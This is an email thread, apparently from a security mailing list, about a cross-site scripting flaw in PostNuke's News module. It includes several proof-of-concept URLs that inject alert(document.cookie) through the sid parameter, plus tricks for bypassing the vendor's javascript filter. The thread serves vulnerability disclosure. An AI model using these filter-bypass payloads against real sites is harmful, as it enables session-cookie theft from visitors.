I just checked it again : http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script> where + denotes a blank space or similarly this one: http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script> resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg. However the request: ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script> or any character inserted before first "script" and after first less than "<" resulting in DB Error, revealing nothing (user/pass/path etc). But I used I.E and Netscape, maybe it's different with other browsers. :) Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- Daniel Woods <dwoods@ucalgary.ca> wrote: > >Humm! > >> on 26th Sep the following url: >> http://news.postnuke.com/modules.php >> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> >> >> used to give Alert PopUp and >> Error: >> DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' >> at line 23 >> >> now it gives: >> Sorry - $HTTP_GET_VARS contains javascript... >> >> Prompt fix by PostNuke team, great work Keep it up! :) > >Not so fast on the praise :( > >It only took me a couple of workarounds to find ways to bypass the check. > > http://news.postnuke.com/modules.php > ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script> > >Using the request... > ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script> >gives me the DB Error: message > >And using the request... > ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script> >gives me the Alert Popup and DB Error: message... the '+' is treated as a blank. > >Thanks... Dan. _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
